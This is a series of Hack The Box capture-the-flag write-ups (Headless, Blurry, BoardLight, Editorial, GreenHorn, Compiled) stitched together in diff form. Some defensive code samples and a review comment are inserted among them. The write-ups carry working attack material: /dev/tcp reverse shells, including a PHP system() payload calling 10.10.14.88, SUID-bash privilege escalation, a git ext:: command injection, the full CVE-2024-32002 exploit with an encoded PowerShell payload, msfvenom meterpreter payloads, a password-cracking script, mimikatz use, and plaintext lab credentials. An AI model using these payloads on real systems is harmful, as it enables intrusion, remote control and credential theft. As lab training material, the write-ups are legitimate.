![Image](/assets/img/post/headless/9.png)
[http://10.10.11.8:5000/dashboard](http://10.10.11.8:5000/dashboard)
![Image](/assets/img/post/headless/10.png)
![Image](/assets/img/post/headless/11.png)
**Reverse Shell**
![Image](/assets/img/post/headless/12.png)
```bash
#!/bin/bash
# Reverse shell script saved into a file; in my case I created a .sh
/bin/bash -c 'exec bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
```
![Image](/assets/img/post/headless/13.png)
![Image](/assets/img/post/headless/14.png)
![Image](/assets/img/post/headless/15.png)
![Image](/assets/img/post/headless/16.png)
**User Flag**
## Privilege Escalation
#### Check sudo -l
![Image](/assets/img/post/headless/17.png)
Syscheck:
```bash
cat /usr/bin/syscheck
```
![Image](/assets/img/post/headless/18.png)
### Exploit [initdb.sh](http://initdb.sh)
```bash
echo "chmod u+s /bin/bash" > initdb.sh
chmod +x initdb.sh
```
- `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges.
- `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user.
![Image](/assets/img/post/headless/19.png)
```bash
sudo /usr/bin/syscheck
/bin/bash -p
```
`/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID.
![Image](/assets/img/post/headless/20.png)
**Root Flag**

@ -0,0 +1,96 @@
---
title: HTB - Blurry
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Blurry]
tags: [HackTheBox, CVE-2024-24590, ClearML, pickle files, pth files,artifact, API]
image:
path: /assets/img/post/blurry/Blurry.png
lqip: 
alt: Hack the Box - Blurry.
---
## Box Info
| Name | Blurry |
| :-------------------- | ---------------: |
| Release Date | 30 Mar, 2024 |
| OS | Linux |
| Rated Difficulty | Medium |
## **Enumeration**
```bash
nmap -p- --open --min-rate 5000 -sS -vvv -n -Pn 10.10.11.19 -oG allports
nmap -sCV -p 22,80 10.10.11.19 -oN targeted
```
![Image](/assets/img/post/blurry/0.png)
```bash
echo " 10.10.11.19 app.blurry.htb" | sudo tee -a /etc/hosts
```
## ClearML
![Image](/assets/img/post/blurry/1.png)
At this point, it is important to know what ClearML is and how it works.
After much searching and gathering information, I found that we can connect through a Python package called clearml-agent and create an environment.
During the research process, I found that clearml has a **`CVE-2024-24590: Pickle Load on Artifact Get`**.
## CVE-2024-24590
*ClearML involves the inherent insecurity of pickle files. We discovered that an attacker could create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.*
<https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/#The-Vulns>
![Image](/assets/img/post/blurry/3.png)
### Create credentials
To do this, we need to create new credentials to connect through clearml-agent, and to set up, we use the 'init' option.
![Image](/assets/img/post/blurry/4.png)
We press enter on the options and boom, we're connected.
![Image](/assets/img/post/blurry/5.png)
So once connected, we'll proceed to exploit the vulnerability.
![Image](/assets/img/post/blurry/6.png)
<https://clear.ml/docs/latest/docs/guides/reporting/using_artifacts/>
<https://davidhamann.de/2020/04/05/exploiting-python-pickle/>
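What makes CVE-2024-24590 possible is a property of `pickle` itself: the format can instruct the loader to call any importable callable, so `Artifact.get()` on an untrusted artifact is code execution. The following is an added example, not ClearML code and not the write-up's payload, that demonstrates this with a harmless stand-in (`os.getcwd`) and then shows the mitigation from the Python documentation: an `Unpickler` subclass whose `find_class` allows only a named set of classes, so the same payload is refused while an ordinary dict of weights still loads.

```python
import io
import os
import pickle


class RunsOnLoad:
    """Whatever __reduce__ returns is called by the loader. os.getcwd is a harmless stand-in."""

    def __reduce__(self):
        return (os.getcwd, ())


def make_demo_payload():
    """Bytes that, when unpickled, call os.getcwd() instead of rebuilding an object."""
    return pickle.dumps(RunsOnLoad())


def make_benign_payload():
    """The kind of artifact an ML pipeline legitimately exchanges: plain containers."""
    return pickle.dumps({"weights": [1.0, 2.0], "epoch": 3})


def demo_payload_runs_code():
    """True if pickle.loads() executed the embedded call (it returns the cwd string)."""
    return pickle.loads(make_demo_payload()) == os.getcwd()


SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "int", "float", "bool", "bytes"}


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list loader (pattern from the Python docs): only named classes may be resolved."""

    ALLOWED = {("builtins", name) for name in SAFE_BUILTINS} | {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_load_rejects(data):
    """True if the allow-list loader refuses the payload."""
    try:
        load_restricted(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("plain pickle.loads ran code:", demo_payload_runs_code())
    print("restricted loader rejected it:", restricted_load_rejects(make_demo_payload()))
    print("restricted loader accepts weights:", load_restricted(make_benign_payload()))
```

The allow-list is the only meaningful line of defence for pickle: signatures or "trusted upload" flags on the artifact do not help once the server-side `get()` deserialises whatever was uploaded. For the PyTorch `.pth` checkpoint used later on this box, `torch.load(..., weights_only=True)` applies the same allow-list idea.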
![Image](/assets/img/post/blurry/7.png)
## Privilege Escalation
### Sudo -l
Once **I had the reverse shell**, I continued with my enumeration and found a vulnerability with 'sudo -l'.
![Image](/assets/img/post/blurry/2.png)
I dug into the files and found that when executing `/usr/bin/evaluate_model`, it ran `demo_model.pth`, which in turn executed the .py file located in `/models/`{: .filepath}. So, I modified the .py file to obtain a reverse shell.
![Image](/assets/img/post/blurry/8.png)
<https://www.revshells.com/>
But be careful, it runs with 'sudo' as it doesn't require a password to execute it, so we'll obtain a privileged reverse shell.
```bash
sudo evaluate_model /models/demo_model.pth
```
![Image](/assets/img/post/blurry/9.png)
With netcat listening on port 9001
![Image](/assets/img/post/blurry/10.png)
**`Root`**
![Image](/assets/img/post/blurry/11.png)

@ -0,0 +1,114 @@
---
title: HTB - BoardLight
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , BoardLight]
tags: [HackTheBox, Dolibarr, PHP, CVE-2023-30253, LinPEAS, CVE-2022-37706]
image:
path: /assets/img/post/boardlight/BoardLight-card.png
lqip: 
alt: Hack the Box - BoardLight.
---
## Box Info
| Name | BoardLight |
| :-------------------- | ---------------: |
| Release Date | 25 May, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
![Image](/assets/img/post/boardlight/0.png)
### SubDomain
```bash
wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.board.htb" -u http://board.htb
```
![Image](/assets/img/post/boardlight/1.png)
![Image](/assets/img/post/boardlight/2.png)
![Image](/assets/img/post/boardlight/e.png)
![Image](/assets/img/post/boardlight/z.png)
The login page accepts the default Dolibarr credentials.
## Dolibarr 17.0.0
### CVE-2023-30253
[`Missing Error Handling | OWASP Foundation`](https://owasp.org/www-community/vulnerabilities/Missing_Error_Handling)
Dolibarr 17.0.0 is vulnerable to `PHP code injection` (RCE), CVE-2023-30253.
[Dolibarr confirm RCE in the version 17.0.0](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh)
[Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan](https://www.swascan.com/security-advisory-dolibarr-17-0-0/)
![Image](/assets/img/post/boardlight/b.png)
We create a page and use PHP to try to get a reverse shell.
![Image](/assets/img/post/boardlight/x.png)
![Image](/assets/img/post/boardlight/s.png)
```php
<?PHP echo system("whoami");?>
```
![Image](/assets/img/post/boardlight/a.png)
```php
<section id="mysection1" contenteditable="true">
<?PHP echo system("bash -c 'bash -i >& /dev/tcp/10.10.14.88/7777 0>&1'");?>
</section>
```
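Note the uppercase `<?PHP` in both payloads: the advisory for CVE-2023-30253 describes exactly this, an uppercase open tag getting past a check that only looked for `<?php`. The following is an added example, not Dolibarr code, that puts that flawed filter beside a case-insensitive one and a stricter one, and runs the write-up's payload through each. It illustrates why a denylist on user-editable website content is fragile, and why the durable fix is not to let PHP in such content execute at all.

```python
import re

# The page content the write-up injects; whether it is accepted depends on the filter.
PAGE_PAYLOAD = '<?PHP echo system("whoami");?>'
BENIGN_PAGE = '<section id="mysection1" contenteditable="true"><p>Hello</p></section>'


def allowed_by_case_sensitive_filter(content):
    """Flawed check: only the lowercase open tag is caught, so '<?PHP' slips through."""
    return "<?php" not in content


def allowed_by_case_insensitive_filter(content):
    """Catches every casing of the tag plus the short echo tag '<?='."""
    return re.search(r"<\?(php|=)", content, re.I) is None


def allowed_by_strict_filter(content):
    """Refuse any processing-instruction opener at all in user-editable content."""
    return "<?" not in content


def evaluate(content):
    """Verdict of each filter for one piece of content, keyed by filter name."""
    return {
        "case_sensitive": allowed_by_case_sensitive_filter(content),
        "case_insensitive": allowed_by_case_insensitive_filter(content),
        "strict": allowed_by_strict_filter(content),
    }


if __name__ == "__main__":
    print("payload:", evaluate(PAGE_PAYLOAD))
    print("benign :", evaluate(BENIGN_PAGE))
```

Even the case-insensitive version still lets `<? ... ?>` through, which PHP executes when `short_open_tag` is on; each gap closed in a denylist tends to reveal the next one, which is the argument for the strict rule or, better, for serving such pages from a handler that never passes them to the PHP interpreter.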
[https://wiki.dolibarr.org/index.php?title=Backups](https://wiki.dolibarr.org/index.php?title=Backups)
### Credentials
```php
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
```
Database credentials: `dolibarrowner` / `serverfun2$2023!!`
```bash
cat /etc/passwd | grep bash
```
SSH: `larissa` / `serverfun2$2023!!`
![Image](/assets/img/post/boardlight/3.png)
I found no exploitable points and uploaded linpeas to scan for vulnerabilities.
## LinPEAS
_LinPEAS is a script that searches for possible paths to escalate privileges on Linux/Unix/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)._
[PEASS-ng/linPEAS at master · peass-ng/PEASS-ng](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS)
## Enlightenment_sys
Enlightenment_sys in some cases could be an internal component or refer to scripts or tools for interacting with Enlightenment; it could also be a module or a configuration depending on the context.
![Image](/assets/img/post/boardlight/4.png)
At this point it is just a matter of exploiting the CVE to escalate privileges and get the root flag.
[GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main)
Run exploit.sh and you obtain a shell as `root`.

@ -0,0 +1,125 @@
---
title: HTB - Editorial
date: 2020-11-18 12:17:34 -0400
categories: [hackthebox , Editorial]
tags: [SSRF, Python, Git]
image:
path: /assets/img/post/editorial/Editorial-card.png
lqip: 
alt: Hack the Box - Editorial.
---
## Box Info
| Name | Editorial |
| :-------------------- | ---------------: |
| Release Date | 15 Jun, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
![Image](/assets/img/post/editorial/image.png)
```bash
echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts
```
![Image](/assets/img/post/editorial/image-1.png)
whatweb:
![Image](/assets/img/post/editorial/image-2.png)
Web:
![Image](/assets/img/post/editorial/image-3.png)
```bash
dirsearch -u http://editorial.htb/
```
![Image](/assets/img/post/editorial/image-4.png)
This page is interesting, we can preview an image from a file or url.
![Image](/assets/img/post/editorial/image-5.png)
## SSRF
The uploaded file is renamed and its extension removed. When we open the preview image in a new tab, the file is downloaded directly, so it seems we can't execute any shell this way.
When I upload a file, add the URL "http://127.0.0.1/" and intercept with Burp Suite, we see a 200 OK response showing an image directory location; this points to an `SSRF`.
![Image](/assets/img/post/editorial/image-6.png)
In an [SSRF](https://portswigger.net/web-security/ssrf) attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like `127.0.0.1` (a reserved IP address that points to the loopback adapter) or `localhost` (a commonly used name for the same adapter)
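The preview feature fetched whatever URL it was given, including the loopback address. The following is an added example, not code from the write-up or the Editorial application, of the validation such a fetcher should do before connecting: allow only `http`/`https`, reject `localhost`, and resolve the host and reject any answer that is loopback, private, link-local or otherwise non-public (including IPv4-mapped IPv6 forms). The resolver is injectable so the example runs offline against a constructed name table; real code would use `dns_resolver`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed name->address table so the example runs offline.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "editorial.htb": ["10.10.11.20"],
}


def dns_resolver(host):
    """Resolve with the system resolver and return every A/AAAA answer."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host}")
    return FAKE_DNS[host]


def _is_public_address(text):
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:127.0.0.1 is still loopback
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_fetch_url(url, resolver=dns_resolver):
    """True only if every address the host resolves to is public and the scheme is web."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return False
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        ipaddress.ip_address(host)
        addresses = [host]             # literal address, nothing to resolve
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:                # NXDOMAIN, timeout, or a miss in the fake table
            return False
    return bool(addresses) and all(_is_public_address(a) for a in addresses)


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1/", "http://example.com/cover.png", "file:///etc/passwd"):
        print(candidate, "->", is_safe_fetch_url(candidate, resolver=fake_resolver))
```

Two caveats a reviewer would add: the check and the connection must use the same resolved address (otherwise a DNS answer that changes between the two, or a redirect to an internal host, gets around it), and on this box the internal API sat on port 5000 of the same host, so blocking loopback alone is the minimum and an allow-list of permitted external hosts is the stronger design.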
![Image](/assets/img/post/editorial/image-7.png)
The response shows us a directory path, let's download the file and see what's inside.
![Image](/assets/img/post/editorial/image-8.png)
![Image](/assets/img/post/editorial/image-9.png)
![Image](/assets/img/post/editorial/image-10.png)
Re-upload the file and add the path in Burp Suite.
`/api/latest/metadata/messages/authors`{: .filepath}
![Image](/assets/img/post/editorial/image-11.png)
![Image](/assets/img/post/editorial/image-12.png)
Username: dev - Password: dev080217_devAPI!@
![Image](/assets/img/post/editorial/image-13.png)
user flag
![Image](/assets/img/post/editorial/image-14.png)
![Image](/assets/img/post/editorial/image-15.png)
### Linux Enumeration
```bash
find / -user dev 2>/dev/null | grep -vE "sys|proc"
```
![Image](/assets/img/post/editorial/image-16.png)
![Image](/assets/img/post/editorial/image-17.png)
The command `git show` displays detailed information about a commit.
![Image](/assets/img/post/editorial/image-18.png)
![Image](/assets/img/post/editorial/image-19.png)
080217_Producti0n_2023!@ for prod
- su `prod`
- password: `080217_Producti0n_2023!@`
## Privilege Escalation
sudo -l
![Image](/assets/img/post/editorial/image-20.png)
```bash
echo '#!/bin/bash' > /tmp/exploit.sh
echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh
```
![Image](/assets/img/post/editorial/image-21.png)
```bash
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"
```
![Image](/assets/img/post/editorial/image-22.png)
- `ls -l /bin/bash`
![Image](/assets/img/post/editorial/image-23.png)
Start a new bash session.
- `/bin/bash -p`
![Image](/assets/img/post/editorial/image-24.png)

@ -0,0 +1,107 @@
---
title: HTB - GreenHorn
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , GreenHorn]
tags: [HackTheBox, CMS pluck, RCE, User-Agent]
image:
path: /assets/img/post/greenhorn/greenhorn-card.png
lqip: 
alt: Hack the Box - GreenHorn.
---
## Box Info
| Name | GreenHorn |
| :-------------------- | ---------------: |
| Release Date | 20 Jul, 2024 |
| OS | Linux |
| Rated Difficulty | Easy |
## **Enumeration**
### Information Gathering
#### Scan with nmap:
![Image](/assets/img/post/greenhorn/image.png)
Add the DNS name to /etc/hosts:
```bash
echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
```
```bash
whatweb greenhorn.htb
```
or use Wappalyzer from the browser.
At the bottom there is a link to an `admin` page for the `CMS` called `pluck`.
![Image](/assets/img/post/greenhorn/image-1.png)
## CMS pluck 4.7.18
In the admin page we found the version of the CMS 'pluck', 4.7.18, which has an `RCE vulnerability`, but we need a password to log in to pluck CMS. So I looked at port 3000, since it serves HTTP with status 200, and investigating it I found a site similar to GitHub. After searching, I found credentials that I assumed would work for pluck CMS.
![Image](/assets/img/post/greenhorn/image-2.png)
## Gitea
![Image](/assets/img/post/greenhorn/image-3.png)
`iloveyou1`
![Image](/assets/img/post/greenhorn/image-4.png)
## Exploitation
I log in to pluck CMS; we are in as administrator and can see the version of the CMS.
![Image](/assets/img/post/greenhorn/image-5.png)
I found an [RCE](https://www.exploit-db.com/exploits/51592) for that version of pluck CMS, and we will use it.
![Image](/assets/img/post/greenhorn/image-6.png)
The "upload_url" in the exploit tells me the site has a section in the pluck "module" area called "installmodule", so we investigate and use it.
![Image](/assets/img/post/greenhorn/image-7.png)
To perform the RCE we need a reverse shell in PHP, because the server runs on Apache; so I use the pentestmonkey reverse shell, compress it and upload it.
![Image](/assets/img/post/greenhorn/image-8.png)
## Privilege Escalation
After uploading the zip we need to load http://greenhorn.htb/data/modules/shell/revshell.php while listening with `nc -lvnp 9001`. Once the page loads we get the reverse shell as www-data, but we reuse the password iloveyou1 to log in as junior and read the user.txt file.
![Image](/assets/img/post/greenhorn/image-9.png)
For privilege escalation we download the file 'Using OpenVAS.pdf'.
![Image](/assets/img/post/greenhorn/image-10.png)
After hours of searching, I needed two tools:
- `pdfimages` from poppler-utils
- `depix.py` from https://github.com/spipm/Depix
```bash
pdfimages ./PDF OUTPUT
```
![Image](/assets/img/post/greenhorn/image-11.png)
## Pixelized Screenshots
```zsh
python3 depix.py -p /path/of/openvas image -s /images/searchimages/debruinseq_notepad_windows10_CloseAndSpace.png -o out1.png
```
![Image](/assets/img/post/greenhorn/image-12.png)
And we get the password for root:
sidefromsidetheothersidesidefromsidetheotherside
![Image](/assets/img/post/greenhorn/image-13.png)
And log in as root.
![Image](/assets/img/post/greenhorn/image-14.png)

@ -0,0 +1,261 @@
---
title: HTB - Compiled
date: 2024-02-02 12:17:34 -0400
categories: [hackthebox , Compiled]
tags: [HackTheBox, CMS pluck, RCE, User-Agent]
image:
path: /assets/img/post/compiled/compiled-card.png
lqip: 
alt: Hack the Box - Compiled.
---
## Box Info
| Name | Compiled |
| :-------------------- | ---------------: |
| Release Date | 20 Jul, 2024 |
| OS | Windows |
| Rated Difficulty | Medium |
## **Enumeration**
Information gathering
Nmap
![Image](/assets/img/post/compiled/image.png)
http://compiled.htb:5000
We have a site that does a git clone of a repository, decompresses it and saves the repository link.
![Image](/assets/img/post/compiled/image-1.png)
The Calculator repository tells us the version of Git that the site runs.
http://compiled.htb:3000/richard/Calculator
![Image](/assets/img/post/compiled/image-2.png)
## CVE-2024-32002
[Resource For Create The Exploit](https://amalmurali.me/posts/git-rce/)
![Image](/assets/img/post/compiled/image-3.png)
In short, we need to create two empty repositories whose names match the ones used in the script, and add the payload generated with the [Reverse Shell Generator](https://www.revshells.com/). You can name the repos `repo1` and `repo2` or whatever you want, as long as the names match the script.
```bash
git clone --recursive git@github.com:amalmurali47/git_rce.git
```
```zsh
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
git clone http://compiled.htb:3000/test/repo1.git
cd repo1
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e JABjAGw...
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://compiled.htb:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://compiled.htb:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push
```
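The script above works because the clone ends up with a symlink (`a`) pointing at `.git`, a submodule path (`A/modules/x`) that collides with it on a case-insensitive filesystem, and an executable `post-checkout` hook delivered through that path; it also needs `protocol.file.allow` relaxed from its default of `user`. A patched Git (2.45.1 and the backports released with it) refuses this layout, but a service that processes arbitrary repositories can also check the tree it just cloned. The following is an added example, not code from the write-up or from the Compiled application, that walks a checkout and reports symlinks whose target is `.git`, nested `.git` directories, and executable files under any `hooks` directory. `build_sample_tree` creates a constructed layout mirroring the write-up's `repo2` (the hook body is a placeholder, not the page's payload).

```python
import os
import shutil
import stat
import tempfile


def audit_checkout(root):
    """Return (kind, relative_path, detail) findings for a freshly cloned working tree."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root and ".git" in dirnames:
            dirnames.remove(".git")          # the repository's own metadata is expected here
        for name in list(dirnames) + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full):
                target = os.readlink(full)
                if ".git" in target.replace("\\", "/").split("/"):
                    findings.append(("symlink-into-git", rel, target))
                continue                     # os.walk does not follow links; neither do we
            if name.lower() == ".git" and dirpath != root:
                findings.append(("nested-git-dir", rel, ""))
            parents = rel.split("/")[:-1]
            if "hooks" in parents and os.path.isfile(full) and os.stat(full).st_mode & stat.S_IXUSR:
                findings.append(("executable-hook", rel, ""))
    return findings


def build_sample_tree(base):
    """Constructed layout mirroring repo2 above: symlink 'a' -> .git and a hook under A/modules/x."""
    os.makedirs(os.path.join(base, ".git"))
    os.makedirs(os.path.join(base, "A", "modules", "x", "hooks"))
    hook = os.path.join(base, "A", "modules", "x", "hooks", "post-checkout")
    with open(hook, "w") as fh:
        fh.write("#!/bin/sh\necho placeholder hook body\n")
    os.chmod(hook, 0o755)
    os.symlink(".git", os.path.join(base, "a"))
    with open(os.path.join(base, "README.md"), "w") as fh:
        fh.write("harmless content\n")


def demo_findings():
    """Build the sample tree in a temporary directory, audit it, and clean up."""
    base = tempfile.mkdtemp(prefix="clone-audit-")
    try:
        build_sample_tree(base)
        return sorted(audit_checkout(base))
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for kind, rel, detail in demo_findings():
        print(f"{kind}: {rel} {detail}".rstrip())
```

Running the audit before `git submodule update` or any checkout-time hook can fire is the point; after the fact the hook has already executed. For a service like the one on this box, keeping Git patched, leaving `protocol.file.allow` at `user`, and cloning into a throwaway container are the controls that do not depend on spotting the layout.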
![Image](/assets/img/post/compiled/image-4.png)
With `rlwrap nc -lvnp 9001` listening, we wait and get the `reverse shell` as `Richard`.
![Image](/assets/img/post/compiled/image-5.png)
Download gitea.db to get `Emily`'s password.
![Image](/assets/img/post/compiled/image-6.png)
## Crack password
The hash is SHA-256 based (PBKDF2).
```
Password: 12345678 (bruh)
```
This is the script I made with ChatGPT to crack the password:
![Image](/assets/img/post/compiled/image-7.png)
#### Script
```python
import hashlib
import binascii


def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    # Gitea-style PBKDF2-HMAC-SHA256: 50000 iterations, 50-byte derived key
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )
    return hash_value


def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):
    target_hash_bytes = binascii.unhexlify(target_hash)
    # errors='ignore': rockyou.txt contains lines that are not valid UTF-8
    with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as file:
        for line in file:
            password = line.strip()
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password
    print("Password not found.")
    return None


# salt and hash copied from the user table in gitea.db
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)
```
### Login as Emily
Evil-winrm for login as Emily :
`sudo evil-winrm -i compiled.htb -u Emily -p '12345678'`
![Image](/assets/img/post/compiled/image-8.png)
Create a payload.exe with msfvenom and upload it:
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9001 -f exe -o payload.exe
```
Use msfconsole to handle the payload; this is just to execute some commands, because in evil-winrm I can't, as the machine is finicky.
### Windows Reconnaissance
```powershell
whoami /priv
$Credential.GetNetworkCredential().password
net user Emily
tasklist
Get-Service
# Upload winPEAS.exe and execute it with PowerShell
./winPEAS.exe
```
## Privilege Escalation
#### WinPEAS.exe
![Image](/assets/img/post/compiled/image-9.png)
Searching on Google I found this
![Image](/assets/img/post/compiled/image-10.png)
## CVE-2024-20656
<https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/>
*NFS is a protocol that allows us to access files over a network in a manner similar to how we access local storage, and its commonly used to share files between UNIX/Linux and Windows systems.*
VSStandardCollectorService150 is a diagnostics tool that is part of Visual Studio; it creates directories and files in the `C:\Windows\Temp`{: .filepath} directory with insufficiently restrictive permissions.
There is a GitHub repository with a PoC for CVE-2024-20656, but we need to make certain modifications to the project and then compile it to an executable.
[CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656/tree/main/Expl)
![Image](/assets/img/post/compiled/image-11.png)
### Visual Studio
The modification we make is:
```cpp
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
```
![Image](/assets/img/post/compiled/image-12.png)
and further down, in the function `void cb1()`:
```cpp
CopyFile(L"c:\\users\\public\\payload2.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
```
Create a new payload with msfvenom to get the shell as Administrator.
```zsh
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9003 -f exe -o payload2.exe
```
You can put the payload/reverse shell there, or create a path in `c:\windows\Temp`{: .filepath}, make a folder 'test' and upload a payload.exe inside it, to get a shell as `NT AUTHORITY\SYSTEM`.
Create a new project using the Desktop Development with C++ kit, right click on the 'Expl' solution, and in the box that appears choose the Add option and select Existing Project.
Tip: I lost hours wondering why Expl.exe didn't work; I found that the build configuration must be set to "`Release`" instead of "`Debug`" for Expl.exe to work and give the reverse shell.
![Image](/assets/img/post/compiled/image-13.png)
Build Solution for compiling/building for get the ouput Expl.exe and upload via Evil-winrm
![Image](/assets/img/post/compiled/image-14.png)
For execute the Expl.exe we need to use RunasCs.exe via Evil-winrm but before to execute the expl.exe we go to generate a reverse shell with RunasCs.exe
```bash
./RunasCs.exe Emily 12345678 powershell.exe -r 10.10.16.45:9090
```
Instant we trying start the service "msiserivce".
```text
Shell with RunasCs.exe
PS>
net start msiservice
```
```text
Shell with Evil-winrm
PS>
./RunasCs.exe Emily 12345678 "C:\Users\Emily\Documents\Expl.exe"
```
With msfconsole listening get the shell as Administrator
![Image](/assets/img/post/compiled/image-15.png)
Rooted
We can upload mimikatz.exe for get the hash and login with evil-winrm
```bash
PS> mimikatz.exe
mimikatz#: lsadumo::sam
```
![Image](/assets/img/post/compiled/image-16.png)
![Image](/assets/img/post/compiled/image-17.png)
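Review bot: The italic sentence that opens the `## CVE-2024-20656` section is about NFS and has nothing to do with the VSStandardCollectorService150 privilege escalation that follows; it reads like a paste from another write-up and should be dropped (the service name in the next sentence is also misspelled as `VSStandarCollectorService150`, while the MDSec URL right above it spells it `vsstandardcollectorservice150`). Two copy-paste hazards for readers: the mimikatz module at the end is written `lsadumo::sam` and must be `lsadump::sam`, and the service named in the prose, "msiserivce", should match the command that follows it, `net start msiservice`. Smaller points: the two snippets under `### Visual Studio` are C/C++ (`WCHAR cmd[] = L"..."` and `CopyFile(...)`) but are fenced as `js`, which breaks highlighting; "NT/Authority System" should be `NT AUTHORITY\SYSTEM`; and the tip about building the PoC in Release rather than Debug is the most useful line in the section and belongs before the "Build Solution" step rather than after it.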


@ -0,0 +1,536 @@
---
title: HTB - Lantern
date: 2024-08-23 00:00:00 +8000
categories: [hackthebox , Compiled]
tags: [HackTheBox, SSRF, Skipper Proxy, Blazer, API, Decompile, DLL, File Disclosure, LFI, RCE, Procmon]
image:
path: /assets/img/post/Lantern/Lantern.png
lqip: 
alt: Hack the Box - Lantern.
---
## Box Info
| Name | Lantern |
| :-------------------- | ---------------: |
| Release Date | 23 Aug, 2024 |
| OS | Windows |
| Rated Difficulty | Hard |
```bash
$ sudo nmap -p- --open --min-rate 5000 -n -sS -vvv 10.10.11.29 -oG allPorts
[sudo] password for racc0x:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-20 13:25 EDT
Initiating Ping Scan at 13:25
Scanning 10.10.11.29 [4 ports]
Completed Ping Scan at 13:25, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:25
Scanning 10.10.11.29 [65535 ports]
